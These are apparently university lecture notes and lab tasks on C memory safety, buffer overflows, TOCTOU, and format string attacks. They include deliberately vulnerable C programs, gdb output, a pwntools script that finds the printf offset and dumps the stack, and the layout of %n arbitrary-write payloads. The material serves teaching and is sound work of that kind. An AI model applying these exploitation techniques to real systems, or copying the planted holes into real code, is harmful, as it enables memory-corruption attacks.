Lecture Notes
This lecture presents an overview of issues involving buffers that are overflowed, underflowed, or otherwise used incorrectly.
Practical tasks
This guide will complement the lecture slides and present code and descriptions to enable exploitation of buffer vulnerabilities.
Memory Structure and Variables
Languages such as C and C++ (among others) allow great flexibility in the use of variables. From the perspective of types, these languages are not fully type-safe: the type checks are limited and are commonly circumvented by developers. Recent compilers provide a great deal of diagnostics to help developers avoid type errors, but that does not prevent developers from casting variables to incompatible types, especially when dealing with pointers to structures (the cast is valid, but the layout of the content is not compatible).
Then there is the notion of memory safety, which is simply not present in these languages. A language that is not memory safe allows developers to access memory with great freedom, exposing the virtual address space allocated to the program.
The following program (not_type_safe.c) gives an insight into the problem. Compile it and run it on your computer. Try to explain the values printed.
int aux = 42;       // Integer
int *value = &aux;  // Pointer to Integer
// Correct usage
printf("%d\n", *value);
// Reading memory after the variable
printf("%d\n", *(value + 4));
// Reading memory before the variable
printf("%d\n", *(value - 4));
// Cast to variable with different storage
printf("%f\n", *((double*) &value));
// Cast to variable with different size
printf("%llu\n", *((unsigned long long*) &value));
The result is something like the following, which includes the value 42 but also other, less predictable values.
42
32693
1
0.000000
140737456555452
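The 0.000000 line can be explained without running the C program. The following is a minimal Python sketch, assuming the pointer bits are the ones printed on the last line of the sample output and that a double is an 8-byte IEEE 754 value stored in little-endian order. It reinterprets the same 8 bytes in both ways, as the two casts do.

```python
import struct

# Pointer value copied from the last line of the sample output above.
pointer_bits = 140737456555452

# Reinterpret the same 8 bytes as a double, as the (double*) cast does.
as_double = struct.unpack("<d", struct.pack("<Q", pointer_bits))[0]

print(hex(pointer_bits))  # 0x7ffffe1ac5bc, a typical stack address
print("%f" % as_double)   # 0.000000
print(as_double)          # a tiny subnormal number, far below what %f can show
```

The exponent bits of such an address are all zero, so the double is a subnormal value that %f rounds to zero.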
A similar program (not_memory_safe.c) specifically explores memory safety with dynamic memory. Check its output.
char* buffer = (char*) malloc(10);  // Buffer with 10 bytes
char* str = buffer;                 // Pointer to buffer
free(buffer);                       // Free buffer!
// Write after free (and write beyond buffer)
memcpy(str, "Hello World!!!!", 15);
// Read after free (and read beyond buffer)
printf("%s\n", str);
Different kinds of variables are allocated in different memory areas. This is intrinsic to each program and is broadly defined by how the program is compiled. When the program is loaded, the addresses may change, but they will still respect this notion of areas.
The following program (mem.c) prints the addresses of several variables that you may find in a program. Some variables are local, some are global, some are static, and some are dynamic. There are also program arguments and functions. When writing a program, the programmer decides how to declare each variable, and this has some impact on where the variable is placed in memory.
const char cntvar[]="constant";
static char bssvar[4];
// ... OMITTED
int main(int argc, char** argv) {
    FILE* fd;
    char line[1024];
    unsigned int mask;
    // Note: these casts keep only the low 32 bits of each address
    unsigned int stack = (unsigned int) &argc;
    unsigned int heap = (unsigned int) malloc(sizeof(unsigned int));
    unsigned int bss = (unsigned int) bssvar;
    unsigned int cnst = (unsigned int) cntvar;
    unsigned int text = (unsigned int) &main;
    // Build a mask that clears the offset inside a page
    memset(&mask,0xff,sizeof(mask));
    mask ^= getpagesize() -1;
    printf("Internal Variables (Page = %u)\n", getpagesize());
    printf("&argc = %08x -> stack = %08x\n", stack, stack & mask);
    printf("malloc = %08x -> heap = %08x\n", heap, heap & mask);
    printf("bssvar = %08x -> bss = %08x\n", bss, bss & mask);
    printf("cntvar = %08x -> const = %08x\n", cnst,cnst & mask);
    printf("&main = %08x -> text = %08x\n", text,text & mask);
}
You can compile the program with gcc -g -o mem mem.c.
NOTE: Recent versions of GCC implement several mitigations against some of the attacks described here. Because the programs we are going to use are small, which reduces the amount of artifacts, it may be better to use an older GCC through Docker. You can run it with docker run --rm -ti -v $(pwd):/host gcc:8 gcc FLAGS -o /host/output /host/input.c
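The page mask computed in mem.c can be reproduced with plain integer arithmetic. The following is a small Python sketch, assuming 32-bit addresses and a 4096-byte page. The helper name page_base and the sample address are made up for this example.

```python
PAGE_SIZE = 4096  # assumed here; mem.c asks the system via getpagesize()

def page_base(address: int, page_size: int = PAGE_SIZE) -> int:
    """Clear the offset bits so that only the page start address remains."""
    # Same idea as memset(&mask, 0xff, ...) followed by mask ^= page_size - 1
    mask = 0xFFFFFFFF ^ (page_size - 1)
    return address & mask

# Hypothetical 32-bit stack address
print(f"{page_base(0xBFEB8140):08x}")  # bfeb8000
```

The second column printed by mem.c is this page start address, which makes it easier to see which variables share a memory area.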
Task:
- Compile and run the program
- Match the addresses printed with the different variable types
- Change the location of a variable, or create others of the same type, and see how it affects the resulting address.
The program also allocates memory on the program stack by calling a function recursively, either until the limit m is reached or until the stack is exhausted.
void foo(int argc, unsigned int mask, unsigned int c, unsigned int m)
{
    char a[4096*0x100];
    unsigned int stack = (unsigned int) &argc;
    printf("foo [%03u]: &argc = %08x -> stack = %08x\n",c,stack, stack & mask);
    if(c < m)
        foo(argc,mask,c+1, m);
}
Each call to foo allocates a variable stack holding the address of the argc argument (this could be avoided, and is here for clarification), and then allocates an array named a of size 4096 * 0x100 bytes (1 MiB). 4096 (or 0x1000) is the standard page size, while 0x100 sets the number of pages. The larger this value, the quicker the program exhausts the stack.
A possible result would be:
foo [000]: &argc = bfeb8140 -> stack = bfeb8000
foo [001]: &argc = bfdb8110 -> stack = bfdb8000
foo [002]: &argc = bfcb80e0 -> stack = bfcb8000
foo [003]: &argc = bfbb80b0 -> stack = bfbb8000
foo [004]: &argc = bfab8080 -> stack = bfab8000
foo [005]: &argc = bf9b8050 -> stack = bf9b8000
foo [006]: &argc = bf8b8020 -> stack = bf8b8000
foo [007]: &argc = bf7b7ff0 -> stack = bf7b7000
foo [008]: &argc = bf6b7fc0 -> stack = bf6b7000
You should notice that stack allocation grows from higher addresses to lower addresses. Depending on your system configuration, the addresses presented may be constant or may vary between runs (for instance, when address space layout randomization is enabled).
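The size of each stack frame can be read directly from the sample output. The following short Python sketch uses only the addresses listed above and subtracts consecutive &argc values.

```python
# &argc values copied from the sample output above, in call order.
addresses = [
    0xBFEB8140, 0xBFDB8110, 0xBFCB80E0, 0xBFBB80B0, 0xBFAB8080,
    0xBF9B8050, 0xBF8B8020, 0xBF7B7FF0, 0xBF6B7FC0,
]

array_size = 4096 * 0x100  # size of the local array a in foo

# Each call sits below the previous one, so subtract newer from older.
frame_sizes = [older - newer for older, newer in zip(addresses, addresses[1:])]

for depth, size in enumerate(frame_sizes, start=1):
    print(f"call {depth}: frame = {size:#x} bytes, "
          f"overhead = {size - array_size} bytes")
```

In this run every frame takes 0x100030 bytes: the 1 MiB array plus 48 bytes for the remaining frame contents.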
Tasks:
- Take note of the addresses on your system, and of how memory usage evolves.
- Run it multiple times.
Variable allocation
Program state is considered to be ephemeral and resides in memory areas specifically allocated for this purpose. Each function call allocates a new stack frame holding local variables and, in some calling conventions, the arguments to the functions it calls. Although we use variables with specific names when developing an application, once the code is compiled, variables are only memory locations. If the language has weak memory management features, or none at all, access may be totally unconstrained, and writing before the start of a variable or beyond its end may be a problem.
Consider the following program, which declares two variables, buffer and message. buffer is a char array with 5 bytes, while message is an array initialized to Hello World.
The for loop writes the value A to buffer, but instead of writing only 5 bytes, it writes 15 bytes. The question that arises is: where do these bytes go?
The program also prints the variable message before and after the loop, which may help us find out.
To check what happens, save the code to bo.c, compile the program with gcc -o bo bo.c, and execute it with ./bo. What you will see is a basic overflow, but more on this later.
#include <stdio.h>
int main(int argc, char* argv[]){
    char message[] = "Hello World";
    char buffer[5];
    int i;
    printf("buffer=%s message=%s\n", buffer, message);
    // Writes 15 bytes into a 5 byte buffer
    for(i = 0; i < 15; i++) {
        buffer[i] = 'A';
    }
    printf("buffer=%s message=%s\n", buffer, message);
}
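The effect of the loop can be modelled without touching real memory. The following Python sketch makes one assumption that your compiler may not honour: buffer is placed immediately before message, with no padding in between. The offsets and the helper c_string are invented for this illustration.

```python
# Assumed layout: buffer (5 bytes) immediately followed by message (12 bytes).
memory = bytearray(5) + bytearray(b"Hello World\x00")
BUFFER, MESSAGE = 0, 5  # offsets inside the simulated memory

def c_string(mem: bytearray, start: int) -> bytes:
    """Read bytes from start up to (not including) the first NUL byte."""
    end = mem.index(0, start)
    return bytes(mem[start:end])

for i in range(15):  # same loop bound as in bo.c
    memory[BUFFER + i] = ord("A")

print(c_string(memory, BUFFER))   # b'AAAAAAAAAAAAAAAd'
print(c_string(memory, MESSAGE))  # b'AAAAAAAAAAd'
```

Under this layout the 10 extra bytes land in message, and buffer has no terminator of its own any more, so printing it continues into message.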
Another available file (mem_local.c) also prints the value of several variables. It can be used to see how the location of a declaration affects the actual memory allocation.
Tasks:
- Compile the program and execute it.
- What can you conclude about the memory structure of these variables?
- Instead of filling the buffer with A, fill it with a variable value (e.g. 'A' + i)
Buffer Overflows and TOCTOU
Many operations are not atomic. When time elapses between the Time Of Check and the Time Of Use (TOCTOU), it may be possible to invalidate the check, or to change its result, allowing access to additional resources.
The following example code is a crude demonstration of TOCTOU, which can be controlled through a buffer overflow. Specifically, the message variable can be used to overwrite the allowed variable, essentially bypassing the previous check.
#include <stdio.h>
#include <string.h>

int main() {
    char allowed = 0;
    char password[8];
    char username[8];
    char message[32];
    puts("username:");
    gets(username);
    puts("password:");
    gets(password);
    // Time of check
    allowed = strcmp("admin", username) + \
              strcmp("topsecrt", password);
    puts("message:");
    gets(message); // <-- Issue here
    printf("user=%s pass=%s result=%d\n", username, \
           password, allowed);
    // Time of use
    if(allowed == 0)
        printf("Access granted. Message sent!\n");
    else
        printf("Access denied\n");
    return 0;
}
If you use gdb to analyze the memory, you can check the order of the variables and notice that message is located before allowed. Therefore, an overflow of message will write over allowed. The amount of data to write depends on the distance between the variables, which can be calculated. An attacker without access to the binary might need to find this distance by brute force, but we won’t need to.
$ p &allowed
0x7ffffffedf2f
$ p &username
0x7ffffffedf1f
$ p &password
0x7ffffffedf27
$ p &message
0x7ffffffedef0
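The distance between the variables follows from the addresses printed by gdb. The following small Python sketch uses the values shown above; on your system the addresses, and possibly the distances, will differ.

```python
# Addresses copied from the gdb session above.
addresses = {
    "message": 0x7FFFFFFEDEF0,
    "username": 0x7FFFFFFEDF1F,
    "password": 0x7FFFFFFEDF27,
    "allowed": 0x7FFFFFFEDF2F,
}

base = addresses["message"]
offsets = {name: addr - base for name, addr in addresses.items()}

for name, offset in sorted(offsets.items(), key=lambda item: item[1]):
    print(f"{name:9s} starts {offset:2d} bytes after message")
```

In this run allowed is the byte at offset 63 from the start of message, well past the 32 bytes reserved for the array.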
Tasks:
- Compile the binary with these flags: gcc -g -O0 -fno-stack-protector -o prog_2 prog_2.c
- Analyze the execution with different payloads
- Determine:
  * What is the stack base address?
  * Where is the return information?
  * How many bytes can be entered to the message without overflow?
  * How many bytes can be written without damage?
  * What happens when an overflow is achieved?
  * How can the decision be subverted?
Format String Attacks
The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.
The attack can be executed when the application does not properly validate the submitted input. In this case, if a format string parameter such as %x is inserted into the posted data, the string is parsed by the format function, and the conversion specified in the parameters is executed. However, the format function expects more arguments as input, and if these arguments are not supplied, the function could read or write the memory.
Consider the following example, which has this vulnerability. The password is random, but the username is printed directly. Also, an invalid check is made, making it possible to exploit the username variable in order to leak the password and then access the system.
Before you start, it is important to determine the printf argument offset. On x86_64 architectures the value is typically around 6, due to the calling convention in use. To determine it, provide a payload in the format b'aaaa%{offset}$x' and change the value of the offset until the output contains 61616161. The use of pwntools is recommended.
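The search for the offset can be rehearsed offline with a toy model. The following Python sketch is not how printf is implemented: fake_printf and find_offset are hypothetical helpers that only understand %N$x, and the model assumes that the first arguments come from registers and that the input buffer sits at the very start of the stack arguments.

```python
import re
import struct

def fake_printf(fmt: bytes, args: list[int]) -> bytes:
    """Toy model: expand only %N$x, printing the low 32 bits of argument N."""
    def expand(match: re.Match) -> bytes:
        index = int(match.group(1))
        return b"%x" % (args[index - 1] & 0xFFFFFFFF)
    return re.sub(rb"%(\d+)\$x", expand, fmt)

def find_offset(register_args: list[int], limit: int = 20) -> int:
    """Return the first argument number whose output echoes b'aaaa'."""
    for offset in range(1, limit):
        payload = b"aaaa%%%d$x" % offset
        # Assumption: the payload itself is stored where stack arguments start.
        padded = payload.ljust(-(-len(payload) // 8) * 8, b"\x00")
        stack_words = [word for (word,) in struct.iter_unpack("<Q", padded)]
        if b"61616161" in fake_printf(payload, register_args + stack_words):
            return offset
    return 0

# Five placeholder values standing in for the register arguments.
print(find_offset([1, 2, 3, 4, 5]))  # 6
```

On a real target the buffer is usually some distance into the stack, so the offset found can be larger than in this model.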
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/random.h>

char *ref_user = "root";
char ref_pass[1024];

void init_pass(char *s, const int len) {
    getrandom(s, len, 0);
    static const char alphanum[] = "0123456789#$!ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    for (int i = 0; i < len; ++i) {
        s[i] = alphanum[((unsigned char) s[i]) % (sizeof(alphanum) - 1)];
    }
    s[len] = 0;
}

void check_user_pass(char* ref_user, char* ref_pass) {
    char username[64];
    char password[64];
    memset(username, 0, 64);
    memset(password, 0, 64);
    fprintf(stdout, "User: ");
    fgets(username, sizeof(username), stdin);
    printf(username);
    fprintf(stdout,"\n");
    if (strncmp(username, ref_user, strlen(ref_user)) != 0) {
        printf("Invalid user\n");
        exit(-1);
    }
    printf("Pass: ");
    fgets(password, sizeof(password), stdin);
    if (strncmp(password, ref_pass, strlen(password) != 0)) {
        printf("Invalid password.\n");
        exit(-2);
    }
}

int main()
{
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);
    printf("Generating Random Pass...");
    init_pass(ref_pass, 16);
    printf("Done\n");
    check_user_pass(ref_user, ref_pass);
    printf("Access Granted\n");
}
Tasks:
- Compile the snippet and run it
- Find how you can provide some payload besides the username
- Using %x, %s or %p, create a payload to get access to the system
- You can use x to dump the entire stack.
Arbitrary writes
The attack also allows the use of %n for arbitrary writes to memory. Given adequate control and knowledge of the stack, this gives the attacker a great deal of control. Consider the program printf_server.c, available on the webpage. The code base is much larger, with several potential flags to be explored using this vulnerability.
The following snippet drives the program with pwntools, determines the offset, and dumps the stack.
from pwn import *

bin = context.binary = ELF('server')
proc = process(bin.path)
proc.recvuntil(b"# ")
proc.sendline(b"2")
proc.recvuntil(b"# ")
offset = 0
# Find offset
for x in range(1, 20):
    proc.sendline(f"aaaa%{x}$x end".encode())
    output = proc.recvuntil(b"# ").strip().replace(b'\n',b' ')
    if b"61616161" in output:
        offset = x
        break
# Dump Stack
for x in range(1, 64):
    proc.sendline(f"%{x}$llx end".encode())
    output = proc.recvuntil(b"# ").strip()
    lines = output.decode().split("\n")
    for line in lines:
        if "end" in line:
            value = int(line.split(" ")[0], 16)
            print("{:02d} {:016x}".format(x, value))
            break
The file printf_server.c contains a variable named aux that facilitates attacks, as it provides a variable with a known location to write data into, which can be used for conducting further writes.
Note that printf stops processing the format string when \x00 is found. Because memory addresses usually contain \x00 bytes, they must be placed at the end of the payload.
The specifier %n can be used as X%Y$n, where X stands for several characters and Y represents the argument number. We can also use hhn, hn, n, or ln, which change the size of the write to 1, 2, 4, or 8 bytes. If X is 20 characters long and Y equals 10, hn will write 16 bits (2 bytes) with the value 20 to the location pointed to by argument Y.
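The effect of the length modifier can be illustrated with a few lines of Python. This is a sketch under stated assumptions: a little-endian machine, an 8-byte long (as on 64-bit Linux), and a made-up helper named bytes_written that models only the bytes stored, not printf itself.

```python
# Bytes stored by each variant; ln assumes an 8-byte long.
SIZES = {"hhn": 1, "hn": 2, "n": 4, "ln": 8}

def bytes_written(count: int, specifier: str) -> bytes:
    """Bytes stored at the target for a given number of printed characters."""
    size = SIZES[specifier]
    truncated = count % (1 << (8 * size))  # the count is cut to the write size
    return truncated.to_bytes(size, "little")

print(bytes_written(20, "hn"))    # b'\x14\x00'
print(bytes_written(300, "hhn"))  # b',' (300 mod 256 = 44 = 0x2c)
```

The narrow variants are useful because they keep the number of characters to print small and leave neighbouring bytes untouched.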
Therefore, we can build a payload such as %Xc, which generates X characters of padding, so that X is the value a following %n stores. Then we can add %A$n, which uses argument A as a pointer to the memory location to write.
If we provide %A$n_padding_ADDRESS, we can make argument A refer to the stack slot that holds ADDRESS. ADDRESS is the address where we want to write some data.
The full payload will be %Xc%A$n_padding_ADDRESS. The size of the _padding_ needs to be adjusted for each use case, as does the argument number A.
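The layout of such a payload can be sketched in Python without pwntools. The function build_write_payload, the fmt_len parameter, and the target address 0x404040 are all hypothetical. The sketch assumes a 64-bit little-endian target where the payload starts at argument number offset and is aligned to 8 bytes.

```python
import struct

def build_write_payload(value: int, address: int, offset: int,
                        fmt_len: int = 16, spec: bytes = b"hn") -> bytes:
    """Build %Xc%A$n + padding + ADDRESS for a 64-bit little-endian target."""
    if value <= 0 or fmt_len % 8 != 0:
        raise ValueError("value must be positive and fmt_len a multiple of 8")
    # A: the argument slot that will hold ADDRESS, right after the format part.
    arg_index = offset + fmt_len // 8
    fmt = b"%%%dc%%%d$" % (value, arg_index) + spec
    if len(fmt) > fmt_len:
        raise ValueError("fmt_len too small for this format string")
    # The padding is printed after the write, so it does not change the count.
    # The address goes last because its zero bytes would end the format string.
    return fmt.ljust(fmt_len, b"_") + struct.pack("<Q", address)

# Write the value 20 to a made-up address, with the payload at argument 6.
print(build_write_payload(20, 0x404040, offset=6))
```

Fixing the length of the format part keeps the argument number stable when the value or the specifier changes.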
The process can be used for arbitrary reads if it is combined with %B$s, where B refers to an address written by the previous exploit. It will be used as a pointer to a string, being equivalent to printf("%s", B), printing all memory until \x00 is found.
Tasks:
- Obtain the flags through multiple methods
  - secret0 is on the stack
  - secret1 is a global variable and not accessible through an argument number. It can be accessed with %s
  - secret2 is not a variable but code, and can be accessed by dumping the program code. (Check the Memory Map)